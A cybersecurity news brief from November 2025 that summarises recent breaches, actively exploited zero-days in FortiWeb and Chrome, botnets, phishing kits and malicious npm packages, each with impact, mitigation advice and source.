svoboda.center Logo svoboda.center

Svoboda Cybersecurity Brief November 19, 2025

Private VPN — just $1.2/mo

Doctor Alliance Suffers Second Hack by Same Threat Actor

The healthcare firm Doctor Alliance was hacked again by the same threat actor “Kazu,” who exfiltrated 1.27 TB of sensitive patient data, including signed documents and medical records. The attacker exploited reused admin passwords from infostealer logs.
Impact: Over 5 million files compromised, including protected health information (PHI).
Mitigation: Patch vulnerabilities, enforce unique passwords, and conduct thorough security assessments.
Source: DataBreaches.net

FortiWeb Zero-Day Exploited in Attacks

Fortinet warned of CVE-2025-58034, an OS command injection flaw in FortiWeb, actively exploited in attacks. The vulnerability allows authenticated attackers to execute arbitrary code via crafted HTTP requests.
Impact: Potential remote code execution on vulnerable systems.
Mitigation: Upgrade to patched versions (e.g., FortiWeb 8.0.2, 7.6.6).
Source: BleepingComputer

ShadowRay 2.0 Botnet Targets Ray Clusters for Crypto Mining

A threat actor (IronErn440) exploits CVE-2023-48022 in Ray clusters to deploy a self-propagating cryptomining botnet. The malware uses XMRig and evades detection with 60% CPU usage limits and fake process names.
Impact: Data theft, DDoS attacks, and resource hijacking.
Mitigation: Deploy Ray in trusted environments, restrict API access, and monitor for anomalies.
Source: BleepingComputer

Chrome Zero-Day (CVE-2025-13223) Exploited in Wild

Google patched a type confusion flaw in Chrome’s V8 engine, actively exploited. The bug allows arbitrary code execution via crafted HTML pages.
Impact: Remote code execution or crashes.
Mitigation: Update to Chrome 142.0.7444.175/.176.
Source: BleepingComputer

French Pajemploi Agency Breach Exposes 1.2M Individuals

Pajemploi, a French childcare payroll service, suffered a breach exposing names, addresses, and social security numbers. No financial data or passwords were compromised.
Source: BleepingComputer

Iranian UNC1549 Hackers Deploy DEEPROOT and TWOSTROKE Malware

The group targeted aerospace and defense sectors using phishing and third-party breaches. Tools include DEEPROOT (Golang backdoor) and TWOSTROKE (C++ backdoor).
Impact: Espionage, credential theft, and lateral movement.
Mitigation: Monitor for suspicious VDI breakouts and enforce MFA.
Source: The Hacker News

Sneaky 2FA Phishing Kit Adds BitB Cloaking

A PhaaS kit now uses Browser-in-the-Browser (BitB) to mimic legitimate login pop-ups, bypassing 2FA. Targets Microsoft accounts via fake CAPTCHA pages.
Impact: Credential theft and account takeover.
Mitigation: Train users to verify URLs and enforce conditional access policies.
Source: The Hacker News

npm Packages Use Adspect Cloaking for Crypto Scams

Seven malicious npm packages (e.g., “signals-embed”) used Adspect to redirect victims to crypto scam pages while evading researchers.
Impact: Supply-chain attacks and financial fraud.
Mitigation: Audit npm dependencies and monitor for suspicious IIFE patterns.
Source: The Hacker News

Microsoft Mitigates Record 15.72 Tbps DDoS Attack

The AISURU botnet (300k IoT devices) launched a 15.72 Tbps UDP flood against an Australian endpoint.
Impact: Service disruption.
Mitigation: Deploy rate-limiting and DDoS protection services.
Source: The Hacker News

Princeton University Breach via Phishing Attack

A phone phishing attack compromised an employee, exposing alumni and donor data (names, emails, donation records). No SSNs or passwords were leaked.
Source: SecurityWeek

Share this brief: https://svo.bz/0qpf

If you want to support us, you can donate here: Donate